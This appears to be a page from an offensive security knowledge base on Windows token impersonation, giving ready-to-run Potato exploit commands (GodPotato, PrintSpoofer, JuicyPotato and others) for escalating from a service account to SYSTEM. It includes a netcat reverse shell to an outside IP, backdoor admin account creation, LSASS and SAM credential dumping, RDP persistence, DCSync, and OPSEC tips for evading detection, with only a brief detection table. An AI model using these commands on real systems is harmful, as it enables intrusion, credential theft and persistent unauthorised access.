attack-45-token-impersonation-seimpersonateprivilege.md (17567B)
1 --- 2 title: "Attack #45 β Token Impersonation (SeImpersonatePrivilege)" 3 description: "Token Impersonation is a local privilege escalation technique that exploits the Windows SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) toβ¦" 4 category: active-directory 5 subcategory: "Privilege & Group Abuse" 6 tags: ["active-directory", "adcs", "privilege-escalation", "sql-injection"] 7 tools: ["Impacket", "Mimikatz", "Metasploit", "Meterpreter", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/π£ Attack #45 β Token Impersonation (SeImpersonatePrivilege).md" 11 --- 12 # π£ Attack #45 β Token Impersonation (SeImpersonatePrivilege) 13 14 *** 15 16 ## π How It Works 17 18 Token Impersonation is a **local privilege escalation technique** that exploits the Windows `SeImpersonatePrivilege` (or `SeAssignPrimaryTokenPrivilege`) to escalate from a service account to `NT AUTHORITY\SYSTEM` β the highest privilege level on a Windows system. This privilege is granted by default to all service accounts, IIS AppPool identities, MSSQL service accounts, and any process running as `NETWORK SERVICE` or `LOCAL SERVICE`. If an attacker compromises any of these accounts (via web shell, SQL injection, etc.), they can escalate to SYSTEM in seconds. 19 20 ### How It Works Technically 21 22 1. **The attacker controls a process** with `SeImpersonatePrivilege` (e.g., a web shell running as `IIS APPPOOL\DefaultAppPool`) 23 2. **The attacker creates a listener** β typically a named pipe or a COM server that listens for incoming connections 24 3. **A SYSTEM-level process is tricked into authenticating** to the attacker's listener β this is achieved by abusing various Windows services (Print Spooler, BITS, DCOM/COM objects, RPC endpoints) 25 4. **The attacker captures the SYSTEM token** β when the privileged process connects, Windows lets the attacker impersonate the connecting client's security context because `SeImpersonatePrivilege` explicitly allows this 26 5. **The attacker spawns a new process** (cmd.exe, reverse shell, beacon) using the captured SYSTEM token 27 28 ### The "Potato" Family Evolution 29 30 The Potato exploit family has evolved over 8+ years as Microsoft patched specific coercion methods, spawning new variants: 31 32 | Tool | Year | Coercion Method | Target OS | Status | 33 |---|---|---|---|---| 34 | **Hot Potato** | 2016 | NBNS spoofing + WPAD + NTLM relay | Win 7/8/10, Server 2008/2012 | β Patched | 35 | **Rotten Potato** | 2016 | DCOM/BITS β NTLM relay to local OXID | Win 10, Server 2012/2016 | β Patched | 36 | **Juicy Potato** | 2018 | Arbitrary CLSID COM abuse | Win β€10 1803, Server β€2016 | β οΈ Partial | 37 | **Rogue Potato** | 2020 | Remote OXID resolution β named pipe | Win 10, Server 2019 | β Works | 38 | **Sweet Potato** | 2020 | Combined β Print Bug + COM + WinRM | Multiple versions | β Works | 39 | **PrintSpoofer** | 2020 | Print Spooler named pipe impersonation | Win 10, Server 2016/2019 | β Works | 40 | **EfsPotato** | 2021 | EFS RPC β named pipe impersonation | Win 10/11, Server 2019/2022 | β Works | 41 | **GodPotato** | 2022 | RPCSS DCOM activation β unnamed pipe | Win 2012β2022, Win 8β11 | β Works | 42 | **SigmaPotato** | 2023 | GodPotato fork with improvements | Multiple versions | β Works | 43 | **CoercedPotato** | 2024 | Multi-protocol coercion (MS-EFSR, MS-RPRN, etc.) | Multiple versions | β Works | 44 45 ### Why Service Accounts Have This Privilege 46 47 ``` 48 # Check current privileges: 49 whoami /priv 50 51 # If you see either of these, you can escalate: 52 # SeImpersonatePrivilege Impersonate a client after authentication Enabled 53 # SeAssignPrimaryTokenPrivilege Replace a process level token Enabled 54 55 # These accounts typically have SeImpersonatePrivilege: 56 # - IIS AppPool accounts (web shells) 57 # - MSSQL Server service accounts (xp_cmdshell) 58 # - NETWORK SERVICE 59 # - LOCAL SERVICE 60 # - Any Windows service account 61 ``` 62 63 *** 64 65 ## βοΈ Prerequisites 66 67 | Requirement | Detail | 68 |---|---| 69 | **Shell as service account** | Running as IIS AppPool, MSSQL, NETWORK SERVICE, or any account with `SeImpersonatePrivilege` | 70 | **SeImpersonatePrivilege enabled** | `whoami /priv` must show `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege` | 71 | **Local system access** | This is a LOCAL privilege escalation β you need a shell on the target machine | 72 | **Appropriate Potato tool** | Must match the target OS version (see compatibility table above) | 73 74 *** 75 76 ## π οΈ Tools 77 78 | Tool | Platform | Notes | 79 |---|---|---| 80 | **GodPotato** | Windows | Most universally compatible β works on 2012-2022 | 81 | **PrintSpoofer** | Windows | Fast, clean β requires Print Spooler running | 82 | **JuicyPotato** | Windows | Classic β older systems only (β€ Win 10 1803) | 83 | **JuicyPotatoNG** | Windows | Updated version with better compatibility | 84 | **SweetPotato** | Windows | Combined approach β multiple coercion methods | 85 | **EfsPotato** | Windows | EFS-based β works on modern systems | 86 | **SigmaPotato** | Windows | GodPotato improvement β broader support | 87 | **CoercedPotato** | Windows | Multi-protocol β most comprehensive | 88 | **SharpEfsPotato** | Windows | .NET implementation of EFS Potato | 89 | **Incognito** | Meterpreter | Token manipulation via Meterpreter framework | 90 91 *** 92 93 ## π» Full Commands 94 95 ### π΅ Step 0 β Verify SeImpersonatePrivilege 96 97 ```powershell 98 # ββ Check if you have the required privilege ββββββββββββββββββββββββββββββββββ 99 whoami /priv 100 101 # Expected output for exploitable service accounts: 102 # Privilege Name Description State 103 # ============================= ========================================= ======== 104 # SeImpersonatePrivilege Impersonate a client after authentication Enabled 105 # SeAssignPrimaryTokenPrivilege Replace a process level token Disabled 106 # (either one is sufficient) 107 108 # ββ Check who you are βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 109 whoami 110 # Expected: iis apppool\defaultapppool, nt service\mssqlserver, etc. 111 112 # ββ Check OS version (to pick the right Potato) ββββββββββββββββββββββββββββββ 113 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 114 [System.Environment]::OSVersion.Version 115 ``` 116 117 *** 118 119 ### π΄ GodPotato (Recommended β Broadest Compatibility) 120 121 ```powershell 122 # ββ Spawn a SYSTEM command prompt βββββββββββββββββββββββββββββββββββββββββββββ 123 .\GodPotato.exe -cmd "cmd /c whoami" 124 # Output: nt authority\system 125 126 # ββ Execute a reverse shell as SYSTEM βββββββββββββββββββββββββββββββββββββββββ 127 .\GodPotato.exe -cmd "cmd /c powershell -e <base64_reverse_shell>" 128 129 # ββ Create a new admin user as SYSTEM βββββββββββββββββββββββββββββββββββββββββ 130 .\GodPotato.exe -cmd "cmd /c net user hacker P@ssword123! /add && net localgroup Administrators hacker /add" 131 132 # ββ Dump SAM database ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 133 .\GodPotato.exe -cmd "cmd /c reg save HKLM\SAM C:\Temp\SAM && reg save HKLM\SYSTEM C:\Temp\SYSTEM" 134 135 # ββ Run Mimikatz as SYSTEM ββββββββββββββββββββββββββββββββββββββββββββββββββββ 136 .\GodPotato.exe -cmd "cmd /c C:\Temp\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > C:\Temp\creds.txt" 137 ``` 138 139 *** 140 141 ### π΄ PrintSpoofer (Clean & Fast β Requires Print Spooler) 142 143 ```powershell 144 # ββ Check if Print Spooler is running βββββββββββββββββββββββββββββββββββββββββ 145 Get-Service Spooler 146 sc query Spooler 147 148 # ββ Spawn interactive SYSTEM shell ββββββββββββββββββββββββββββββββββββββββββββ 149 .\PrintSpoofer64.exe -i -c cmd 150 # Drops you into an interactive cmd.exe as SYSTEM 151 152 # ββ Non-interactive command execution βββββββββββββββββββββββββββββββββββββββββ 153 .\PrintSpoofer64.exe -c "cmd /c whoami" 154 # Output: nt authority\system 155 156 # ββ Reverse shell βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 157 .\PrintSpoofer64.exe -c "cmd /c C:\Temp\nc.exe 10.10.14.5 4444 -e cmd.exe" 158 159 # ββ 32-bit version (for 32-bit processes like IIS on x86 app pools) ββββββββββ 160 .\PrintSpoofer32.exe -i -c cmd 161 ``` 162 163 *** 164 165 ### π΄ JuicyPotato (Legacy β Older OS Only) 166 167 ```powershell 168 # ββ Basic SYSTEM shell ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 169 .\JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} 170 # -l = COM listener port (arbitrary) 171 # -p = program to launch as SYSTEM 172 # -t = createprocess call type (* = try both) 173 # -c = CLSID to abuse (varies by OS β see below) 174 175 # ββ Execute specific command ββββββββββββββββββββββββββββββββββββββββββββββββββ 176 .\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami > C:\Temp\whoami.txt" \ 177 -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} 178 179 # ββ Reverse shell βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 180 .\JuicyPotato.exe -l 1337 -p cmd.exe \ 181 -a "/c powershell -e <base64_reverse_shell>" \ 182 -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} 183 184 # ββ Common CLSIDs by OS ββββββββββββββββββββββββββββββββββββββββββββββββββββββ 185 # Windows 10 Pro: {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} 186 # Windows Server 2016: {8F5DF053-3013-4dd8-B5F4-88214E81C0CF} 187 # Windows Server 2012: {e60687f7-01a1-40aa-86ac-db1cbf673334} 188 # Full CLSID list: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md 189 ``` 190 191 *** 192 193 ### π΄ EfsPotato (Modern Systems) 194 195 ```powershell 196 # ββ Compile and run (requires .NET framework) ββββββββββββββββββββββββββββββββ 197 .\EfsPotato.exe whoami 198 # Output: nt authority\system 199 200 # ββ Execute command βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 201 .\EfsPotato.exe "cmd /c net user hacker P@ssword123! /add" 202 .\EfsPotato.exe "cmd /c net localgroup Administrators hacker /add" 203 ``` 204 205 *** 206 207 ### π΄ SweetPotato (Multi-Method) 208 209 ```powershell 210 # ββ Auto-detect best method ββββββββββββββββββββββββββββββββββββββββββββββββββ 211 .\SweetPotato.exe -p cmd.exe -a "/c whoami" 212 213 # ββ Specify method (PrintSpoofer technique) βββββββββββββββββββββββββββββββββββ 214 .\SweetPotato.exe -e PrintSpoofer -p cmd.exe -a "/c whoami" 215 216 # ββ WinRM method ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 217 .\SweetPotato.exe -e WinRM -p cmd.exe -a "/c whoami" 218 219 # ββ DCOM method (classic Juicy) βββββββββββββββββββββββββββββββββββββββββββββββ 220 .\SweetPotato.exe -e DCOM -p cmd.exe -a "/c whoami" 221 ``` 222 223 *** 224 225 ### π΄ Meterpreter β Incognito Module (If Using Metasploit) 226 227 ```bash 228 # ββ From a Meterpreter session ββββββββββββββββββββββββββββββββββββββββββββββββ 229 meterpreter> load incognito 230 231 # List available tokens 232 meterpreter> list_tokens -u 233 # Look for: NT AUTHORITY\SYSTEM, domain\admin_user, etc. 234 235 # Impersonate SYSTEM token 236 meterpreter> impersonate_token "NT AUTHORITY\SYSTEM" 237 # [+] Delegation token available 238 # [+] Successfully impersonated user NT AUTHORITY\SYSTEM 239 240 # Impersonate domain admin token (if one is logged in) 241 meterpreter> impersonate_token "CORP\domain_admin" 242 243 # Verify 244 meterpreter> getuid 245 # Server username: NT AUTHORITY\SYSTEM 246 247 # Drop to shell 248 meterpreter> shell 249 C:\> whoami 250 nt authority\system 251 ``` 252 253 *** 254 255 ### π΄ Post-Exploitation β After SYSTEM 256 257 ```powershell 258 # ββ Once SYSTEM, extract all credentials ββββββββββββββββββββββββββββββββββββββ 259 260 # Dump all logon credentials from LSASS 261 mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit 262 263 # Dump SAM database (local accounts) 264 reg save HKLM\SAM C:\Temp\SAM 265 reg save HKLM\SYSTEM C:\Temp\SYSTEM 266 reg save HKLM\SECURITY C:\Temp\SECURITY 267 # Exfiltrate and parse with secretsdump.py: 268 # secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL 269 270 # Enable RDP for persistence 271 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 272 netsh advfirewall firewall set rule group="remote desktop" new enable=Yes 273 274 # Create a persistent admin account 275 net user backdoor P@ssword123! /add 276 net localgroup Administrators backdoor /add 277 278 # If domain-joined, DCSync is now possible from this machine 279 mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:corp.local /user:krbtgt" exit 280 ``` 281 282 *** 283 284 ## π― OPSEC Tips 285 286 - **GodPotato is the safest choice** β it works on the widest range of OS versions (2012-2022) and doesn't require specific services to be running 287 - **PrintSpoofer is fastest** but requires Print Spooler β check `sc query Spooler` first; if it's disabled, use GodPotato 288 - **JuicyPotato won't work** on Windows 10 build 1809+ or Server 2019+ β Microsoft blocked the DCOM activation path 289 - **Avoid dropping binaries to disk** if possible β use in-memory execution via PowerShell reflection or .NET assembly loading 290 - **The Potato exploit itself is not detected** as easily as what you do AFTER getting SYSTEM β credential dumping and admin account creation are the loud parts 291 - **Token impersonation via Meterpreter/Incognito** is useful when there's a logged-in admin session on the box β you can steal their token without knowing their password 292 293 *** 294 295 ## π‘οΈ Detection β Event IDs 296 297 | Event ID | Source | What to Look For | 298 |---|---|---| 299 | **4688** | Security Log | Process creation β unexpected `cmd.exe` or `powershell.exe` spawned by service accounts (IIS, MSSQL, etc.) | 300 | **4672** | Security Log | Special privileges assigned to new logon β SYSTEM token usage from unexpected source | 301 | **4624** | Security Log | New logon β SYSTEM logon (Type 2 or 5) from unexpected parent process | 302 | **7045** | System Log | New service installed β some Potato variants create temporary services | 303 | **Sysmon 10** | Sysmon | Process access β tool accessing LSASS memory (post-exploitation) | 304 | **Sysmon 1** | Sysmon | Process creation with full command line β Potato binary execution | 305 | **Sysmon 17/18** | Sysmon | Named pipe creation/connection β PrintSpoofer creates `\\.\pipe\spoolss` variants | 306 307 **Primary detection signature:** Monitor for **unexpected parent-child process relationships** involving service accounts. If `w3wp.exe` (IIS), `sqlservr.exe` (MSSQL), or `svchost.exe` spawns `cmd.exe` or `powershell.exe` as SYSTEM, that is a near-certain indicator of token impersonation. Sysmon with proper configuration provides the most reliable detection through process creation events with full command lines and named pipe monitoring. 308 309 *** 310 311 ## π Attack Chain Context 312 313 ``` 314 [Token Impersonation] βββ Local SYSTEM Privilege Escalation 315 β 316 ββββ π Web shell (IIS) β SeImpersonatePrivilege β SYSTEM β credentials 317 ββββ ποΈ SQL injection (MSSQL xp_cmdshell) β SYSTEM β lateral movement 318 ββββ π SYSTEM β dump LSASS β extract domain creds β DCSync 319 ββββ π» SYSTEM β read DPAPI secrets, SAM hives, LSA secrets 320 ββββ π Chain with: PtH (Attack #4), DCSync (#37), lateral movement (#54-60) 321 ββββ π Commonly the first escalation after initial web/SQL compromise 322 ββββ π Defeated by: don't grant SeImpersonatePrivilege, use gMSAs, patch 323 ``` 324 325 **Token Impersonation is the most common local privilege escalation** in real-world engagements. Nearly every web application compromise or SQL injection that yields command execution results in a service account shell with SeImpersonatePrivilege β and from there, SYSTEM is one binary execution away. 326 327 *** 328 329 > β **Attack #45 β Token Impersonation complete.**